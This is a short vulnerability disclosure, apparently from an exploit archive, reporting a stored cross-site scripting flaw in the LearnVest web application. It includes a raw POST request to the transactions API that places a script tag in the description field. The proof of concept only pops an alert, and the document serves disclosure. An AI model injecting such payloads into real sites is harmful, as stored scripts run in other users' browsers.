LearnVest Web Application suffers from a persistent cross site scripting vulnerability.
3593feb65f3d43639b0088d9a7262d08022e8d86ddfde1a58ca8d125df0eeb33
# Exploit Title: LearnVest Web Application - Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://www.learnvest.com
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Request
Request
POST /api/20121201/transactions HTTP/1.1
Host: www.learnvest.com
[{"description":"<script>alert('xss')</script>","displayDate":"Jun 18, 2016","postDate":"2016-06-18","amount":2000,"folderId":405800536,"isCredit":"false","isFromATM":true}]